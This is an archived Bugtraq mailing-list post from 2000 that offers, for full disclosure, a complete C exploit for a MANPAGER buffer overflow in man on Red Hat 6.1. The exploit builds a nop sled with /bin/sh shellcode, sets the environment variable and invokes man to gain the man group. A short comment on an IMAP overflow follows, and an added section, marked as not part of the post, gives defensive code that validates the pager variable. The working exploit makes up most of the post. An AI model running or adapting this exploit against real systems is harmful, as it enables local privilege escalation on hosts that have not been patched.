5034329 2000-04-24 21:55 /109 lines/ Postmaster
Recipient: Bugtraq (import) <10594>
Subject: man-exploit for MANPAGER environment and a comment about the IMAP vuln
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Message-ID: <19033.956566296@www4.gmx.net>
Date: Mon, 24 Apr 2000 10:51:36 +0200
Reply-To: psychoid@GMX.NET
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: psychoid@GMX.NET
To: BUGTRAQ@SECURITYFOCUS.COM
For the sake of full disclosure, an exploit for the MANPAGER
environment variable:
- snip -
/*
 * MAN-Exploit for MANPAGER environmental variable.
 * rh 6.x, tested on rh 6.1
 * written by psychoid/tCl
 * gives egid man.
 *
 * Originally discovered by lcamtuf.
 * educational. yes.
 *
 */
#include <sys/types.h>   /* u_char */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    unsigned long offset;
    unsigned long addi = 0xbfffacc4;   /* base stack address for rh 6.1 */
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
        "\xd7\xff\xff\xff/bin/sh";
    /* extreme nice shellycode */
    size_t shlen = strlen((char *)execshell);
    size_t i;

    /* optional argv[1]: hex offset added to the base address (default 150) */
    if (argc < 2) {
        offset = 150;
    } else {
        offset = strtoul(argv[1], NULL, 16);
    }
    printf("Building buffer for address %-8lx\n", offset + addi);

    buff = malloc(4062);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(1);
    }
    ptr = buff;
    printf("Nopping..\n");
    /* filling with nops; the last byte stays 0 so the buffer is a C string */
    memset(ptr, 0x0, 4062);
    memset(ptr, 0x90, 4061);
    printf("Setting address.. %p\n", (void *)ptr);
    /* the guessed address goes at the fixed offset inside the buffer */
    ptr += 0xf71;
    addr_ptr = (unsigned long *)ptr;
    *(addr_ptr++) = offset + addi;
    /* shelly: placed right before the address, after the nop sled */
    printf("Copying shell code..\n");
    ptr = buff + 0xf6f - shlen;
    for (i = 0; i < shlen; i++)
        *(ptr++) = execshell[i];
    *ptr++ = '\n';
    printf("Done. Setting environmental variable.\n");
    setenv("MANPAGER", buff, 1);
    printf("Calling man..\n");
    execl("/usr/bin/man", "psychoid", "man", NULL);
    exit(0x0);
}
-snap-
A comment about IMAP and the possibility to gain shell access by
generating an overflow (tested for IMAP 12.250 on redhat 6.1):
IMAP filters characters which would have to be used in a changed
return address (0xFF for example), so an exploit could crash the
active instance (which could result in a core dump to a preselected
folder) only.
It's impossible to give a return address to the range of the buffer.
Greetings,
psychoid
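Added example (not part of psychoid's post and not man's own code): the defensive pattern the MANPAGER overflow above calls for, modelled on a setgid helper. PAGER_MAX, DEFAULT_PAGER and the function names are assumptions of this example; the point is that a setgid/setuid process ignores the pager variable outright, and an unprivileged one only accepts a short, printable value, so a nop sled like the one built above is rejected before it reaches a fixed-size buffer.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PAGER_MAX 255                 /* bound chosen for this example */
#define DEFAULT_PAGER "/usr/bin/less" /* assumed fallback pager */

/* True when effective ids differ from real ids, i.e. the binary runs
 * setuid/setgid and its environment came from an untrusted invoker. */
int running_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Accept a pager value only if it is short and printable ASCII: copy it
 * to out (size outlen) and return 0, else return -1 with out left empty. */
int validate_pager(const char *value, char *out, size_t outlen)
{
    size_t n = 0;
    if (outlen == 0) return -1;
    out[0] = '\0';
    if (value == NULL) return -1;
    while (n <= PAGER_MAX && value[n] != '\0') {
        unsigned char c = (unsigned char)value[n];
        if (c >= 0x80 || !isprint(c)) return -1;  /* 0x90 sled, raw bytes, '\n' */
        n++;
    }
    if (n == 0 || n > PAGER_MAX || n >= outlen) return -1;
    memcpy(out, value, n + 1);
    return 0;
}

/* Privileged processes never let the environment pick the program to
 * exec; unprivileged ones use it only after validation. */
const char *choose_pager(const char *env_value, int privileged,
                         char *out, size_t outlen)
{
    if (!privileged && validate_pager(env_value, out, outlen) == 0)
        return out;
    return DEFAULT_PAGER;
}

int main(void)
{
    char buf[PAGER_MAX + 1];
    printf("pager: %s\n", choose_pager(getenv("MANPAGER"),
                                       running_privileged(), buf, sizeof buf));
    return 0;
}
```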